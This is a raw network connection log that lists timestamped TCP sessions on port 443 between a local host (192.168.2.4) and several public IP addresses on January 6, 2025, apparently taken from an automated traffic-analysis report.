                                                                                                                                                                  Jan 6, 2025 23:18:01.370157957 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.370201111 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.370218039 CET49928443192.168.2.4142.250.185.65
                                                                                                                                                                  Jan 6, 2025 23:18:01.370225906 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.370273113 CET49928443192.168.2.4142.250.185.65
                                                                                                                                                                  Jan 6, 2025 23:18:01.372045040 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.374008894 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.374073029 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.374119997 CET49928443192.168.2.4142.250.185.65
                                                                                                                                                                  Jan 6, 2025 23:18:01.374128103 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.374207020 CET49928443192.168.2.4142.250.185.65
                                                                                                                                                                  Jan 6, 2025 23:18:01.376291037 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.378447056 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.378487110 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.378494978 CET49928443192.168.2.4142.250.185.65
                                                                                                                                                                  Jan 6, 2025 23:18:01.378504992 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.378539085 CET49928443192.168.2.4142.250.185.65
                                                                                                                                                                  Jan 6, 2025 23:18:01.378549099 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.378606081 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.378667116 CET49928443192.168.2.4142.250.185.65
                                                                                                                                                                  Jan 6, 2025 23:18:01.378675938 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.378689051 CET49928443192.168.2.4142.250.185.65
                                                                                                                                                                  Jan 6, 2025 23:18:01.464267969 CET49940443192.168.2.418.244.18.27
                                                                                                                                                                  Jan 6, 2025 23:18:01.464279890 CET4434994018.244.18.27192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.574948072 CET49940443192.168.2.418.244.18.27
                                                                                                                                                                  Jan 6, 2025 23:18:01.616569996 CET49958443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:01.616602898 CET44349958172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.616727114 CET49958443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:01.616913080 CET49958443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:01.616923094 CET44349958172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.617331028 CET49959443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:01.617353916 CET44349959172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.617602110 CET49959443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:01.617809057 CET49959443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:01.617820978 CET44349959172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.715332031 CET49961443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:01.715389013 CET44349961172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.715446949 CET49961443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:01.715986013 CET49961443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:01.716011047 CET44349961172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.089059114 CET44349958172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.089332104 CET49958443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.089340925 CET44349958172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.090828896 CET44349958172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.090897083 CET49958443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.093261957 CET49958443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.093344927 CET44349958172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.094748020 CET49958443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.094753027 CET44349958172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.096918106 CET44349959172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.097213030 CET49959443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.097223997 CET44349959172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.098227024 CET44349959172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.098283052 CET49959443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.099287987 CET49959443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.099359989 CET44349959172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.099714994 CET49959443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.099723101 CET44349959172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.150207996 CET49959443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.170969009 CET44349961172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.171401978 CET49961443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.171422005 CET44349961172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.172688007 CET44349961172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.172755957 CET49961443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.182352066 CET49961443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.182416916 CET44349961172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.182557106 CET49961443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.182565928 CET44349961172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.205836058 CET44349958172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.205899000 CET49958443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.206069946 CET49958443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.206083059 CET44349958172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.237584114 CET44349959172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.237633944 CET44349959172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.237684965 CET49959443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.237797976 CET49959443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.237809896 CET44349959172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.285285950 CET49961443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.297785044 CET44349961172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.297832012 CET44349961172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.297960997 CET49961443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.298041105 CET49961443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.298057079 CET44349961172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.293808937 CET49971443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.293853045 CET44349971172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.293904066 CET49971443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.294593096 CET49972443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.294621944 CET44349972172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.294781923 CET49972443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.295644045 CET49971443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.295658112 CET44349971172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.295917988 CET49972443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.295931101 CET44349972172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.302444935 CET49973443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.302465916 CET44349973172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.302617073 CET49973443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.302859068 CET49974443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.302877903 CET44349974172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.302948952 CET49974443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.303956032 CET49973443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.303972006 CET44349973172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.304263115 CET49974443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.304270983 CET44349974172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.457665920 CET49975443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.457690954 CET44349975172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.458175898 CET49976443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.458198071 CET44349976172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.458209991 CET49975443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.458249092 CET49976443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.460870028 CET49976443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.460894108 CET44349976172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.461194038 CET49975443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.461206913 CET44349975172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.749943972 CET44349971172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.769777060 CET44349974172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.772602081 CET44349972172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.790642023 CET44349973172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.817549944 CET49971443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.817715883 CET49974443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.817715883 CET49972443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.857249975 CET49971443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.857273102 CET44349971172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.857736111 CET44349971172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.859858036 CET49972443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.859864950 CET44349972172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.860433102 CET44349972172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.861335993 CET49974443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.861341953 CET44349974172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.861644983 CET49973443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.861670017 CET44349973172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.862468958 CET44349974172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.862530947 CET49974443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.862703085 CET44349973172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.862715006 CET44349973172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.862761021 CET49973443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.863267899 CET49971443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.863359928 CET44349971172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.864506006 CET49972443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.864592075 CET44349972172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.865458012 CET49974443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.865525961 CET44349974172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.865778923 CET49973443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.865849972 CET44349973172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.916259050 CET49972443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.918193102 CET44349976172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.918817043 CET49976443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.918833017 CET44349976172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.919118881 CET44349976172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.919755936 CET49976443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.919811010 CET44349976172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.933495998 CET49971443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.933509111 CET49973443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.933516026 CET49974443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.933525085 CET44349974172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.933532000 CET44349973172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.938606977 CET44349975172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.939256907 CET49975443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.939277887 CET44349975172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.939568996 CET44349975172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.940406084 CET49975443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.940460920 CET44349975172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.970160007 CET49981443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:03.970211029 CET4434998123.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.970268965 CET49981443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:03.970386982 CET49982443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:03.970418930 CET4434998223.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.970468998 CET49982443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:03.970618963 CET49981443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:03.970642090 CET4434998123.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.970778942 CET49982443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:03.970794916 CET4434998223.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.980665922 CET49975443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:04.118968964 CET49976443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:04.118987083 CET49973443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:04.119023085 CET49974443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:04.433159113 CET4434998123.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:04.433373928 CET49981443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:04.433417082 CET4434998123.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:04.433820009 CET4434998123.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:04.434153080 CET49981443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:04.434254885 CET4434998123.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:04.438189030 CET4434998223.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:04.438355923 CET49982443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:04.438378096 CET4434998223.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:04.439539909 CET4434998223.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:04.439824104 CET49982443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:04.440011978 CET4434998223.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:04.559938908 CET49981443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:04.559989929 CET49982443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:05.665199041 CET49940443192.168.2.418.244.18.27
                                                                                                                                                                  Jan 6, 2025 23:18:05.711343050 CET4434994018.244.18.27192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:05.732758045 CET50004443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:05.732803106 CET4435000420.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:05.736970901 CET50004443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:05.736970901 CET50004443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:05.737011909 CET4435000420.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:05.848053932 CET4434994018.244.18.27192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:05.848515987 CET4434994018.244.18.27192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:05.848581076 CET49940443192.168.2.418.244.18.27
                                                                                                                                                                  Jan 6, 2025 23:18:05.850959063 CET49940443192.168.2.418.244.18.27
                                                                                                                                                                  Jan 6, 2025 23:18:05.850976944 CET4434994018.244.18.27192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:06.068562984 CET50008443192.168.2.418.173.219.113
                                                                                                                                                                  Jan 6, 2025 23:18:06.068592072 CET4435000818.173.219.113192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:06.068705082 CET50008443192.168.2.418.173.219.113
                                                                                                                                                                  Jan 6, 2025 23:18:06.070776939 CET50008443192.168.2.418.173.219.113
                                                                                                                                                                  Jan 6, 2025 23:18:06.070785999 CET4435000818.173.219.113192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:06.296365023 CET50016443192.168.2.420.110.205.119
                                                                                                                                                                  Jan 6, 2025 23:18:06.296391010 CET4435001620.110.205.119192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:06.296467066 CET50016443192.168.2.420.110.205.119
                                                                                                                                                                  Jan 6, 2025 23:18:06.296674967 CET50016443192.168.2.420.110.205.119
                                                                                                                                                                  Jan 6, 2025 23:18:06.296684980 CET4435001620.110.205.119192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:06.355182886 CET4435000420.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:06.355422974 CET50004443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:06.355441093 CET4435000420.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:06.356559038 CET4435000420.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:06.356615067 CET50004443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:06.357990026 CET50004443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:06.358047962 CET4435000420.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:06.358417988 CET50004443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:06.358427048 CET4435000420.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:06.358458996 CET50004443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:06.358501911 CET4435000420.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:06.399372101 CET50004443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:06.543466091 CET4435000420.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:06.543525934 CET4435000420.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:06.543678045 CET50004443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:06.544097900 CET50004443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:06.544107914 CET4435000420.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:06.544123888 CET50004443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:06.544143915 CET50004443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:06.653254986 CET4435000818.173.219.113192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:06.653466940 CET50008443192.168.2.418.173.219.113
                                                                                                                                                                  Jan 6, 2025 23:18:06.653482914 CET4435000818.173.219.113192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:06.653783083 CET4435000818.173.219.113192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:06.654055119 CET50008443192.168.2.418.173.219.113
                                                                                                                                                                  Jan 6, 2025 23:18:06.654109001 CET4435000818.173.219.113192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:06.654171944 CET50008443192.168.2.418.173.219.113
                                                                                                                                                                  Jan 6, 2025 23:18:06.699331045 CET4435000818.173.219.113192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:06.773874044 CET4435000818.173.219.113192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:06.773930073 CET4435000818.173.219.113192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:06.773987055 CET50008443192.168.2.418.173.219.113
                                                                                                                                                                  Jan 6, 2025 23:18:06.775218010 CET50008443192.168.2.418.173.219.113
                                                                                                                                                                  Jan 6, 2025 23:18:06.775229931 CET4435000818.173.219.113192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:06.871761084 CET4435001620.110.205.119192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:06.872220039 CET50016443192.168.2.420.110.205.119
                                                                                                                                                                  Jan 6, 2025 23:18:06.872237921 CET4435001620.110.205.119192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:06.872566938 CET4435001620.110.205.119192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:06.873219967 CET50016443192.168.2.420.110.205.119
                                                                                                                                                                  Jan 6, 2025 23:18:06.873284101 CET4435001620.110.205.119192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:06.873409986 CET50016443192.168.2.420.110.205.119
                                                                                                                                                                  Jan 6, 2025 23:18:06.915019989 CET50016443192.168.2.420.110.205.119
                                                                                                                                                                  Jan 6, 2025 23:18:06.915025949 CET4435001620.110.205.119192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:07.037405014 CET4435001620.110.205.119192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:07.037522078 CET4435001620.110.205.119192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:07.037611008 CET50016443192.168.2.420.110.205.119
                                                                                                                                                                  Jan 6, 2025 23:18:07.039833069 CET50016443192.168.2.420.110.205.119
                                                                                                                                                                  Jan 6, 2025 23:18:07.039846897 CET4435001620.110.205.119192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:07.146806002 CET50028443192.168.2.423.43.85.38
                                                                                                                                                                  Jan 6, 2025 23:18:07.146847963 CET4435002823.43.85.38192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:07.146912098 CET50028443192.168.2.423.43.85.38
                                                                                                                                                                  Jan 6, 2025 23:18:07.147460938 CET50029443192.168.2.423.43.85.38
                                                                                                                                                                  Jan 6, 2025 23:18:07.147489071 CET4435002923.43.85.38192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:07.147573948 CET50029443192.168.2.423.43.85.38
                                                                                                                                                                  Jan 6, 2025 23:18:07.147897959 CET50028443192.168.2.423.43.85.38
                                                                                                                                                                  Jan 6, 2025 23:18:07.147912025 CET4435002823.43.85.38192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:07.148576975 CET50029443192.168.2.423.43.85.38
                                                                                                                                                                  Jan 6, 2025 23:18:07.148591042 CET4435002923.43.85.38192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:07.149452925 CET50030443192.168.2.4204.79.197.219
                                                                                                                                                                  Jan 6, 2025 23:18:07.149470091 CET44350030204.79.197.219192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:07.149578094 CET50030443192.168.2.4204.79.197.219
                                                                                                                                                                  Jan 6, 2025 23:18:07.150376081 CET50031443192.168.2.4204.79.197.219
                                                                                                                                                                  Jan 6, 2025 23:18:07.150383949 CET44350031204.79.197.219192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:07.150552988 CET50031443192.168.2.4204.79.197.219
                                                                                                                                                                  Jan 6, 2025 23:18:07.150670052 CET50030443192.168.2.4204.79.197.219
                                                                                                                                                                  Jan 6, 2025 23:18:07.150687933 CET44350030204.79.197.219192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:07.151367903 CET50031443192.168.2.4204.79.197.219
                                                                                                                                                                  Jan 6, 2025 23:18:07.151376963 CET44350031204.79.197.219192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:07.610974073 CET4435002823.43.85.38192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:07.611207008 CET50028443192.168.2.423.43.85.38
                                                                                                                                                                  Jan 6, 2025 23:18:07.611227036 CET4435002823.43.85.38192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:07.611287117 CET4435002923.43.85.38192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:07.611666918 CET50029443192.168.2.423.43.85.38
                                                                                                                                                                  Jan 6, 2025 23:18:07.611684084 CET4435002923.43.85.38192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:07.612868071 CET4435002823.43.85.38192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:07.612869024 CET4435002923.43.85.38192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:07.612942934 CET50028443192.168.2.423.43.85.38
                                                                                                                                                                  Jan 6, 2025 23:18:07.612945080 CET50029443192.168.2.423.43.85.38
                                                                                                                                                                  Jan 6, 2025 23:18:07.675803900 CET50028443192.168.2.423.43.85.38
                                                                                                                                                                  Jan 6, 2025 23:18:07.675957918 CET4435002823.43.85.38192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:07.676528931 CET50029443192.168.2.423.43.85.38
                                                                                                                                                                  Jan 6, 2025 23:18:07.676695108 CET4435002923.43.85.38192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:07.716969013 CET44350031204.79.197.219192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:07.717583895 CET50031443192.168.2.4204.79.197.219
                                                                                                                                                                  Jan 6, 2025 23:18:07.717593908 CET44350031204.79.197.219192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:07.718550920 CET44350031204.79.197.219192.168.2.4
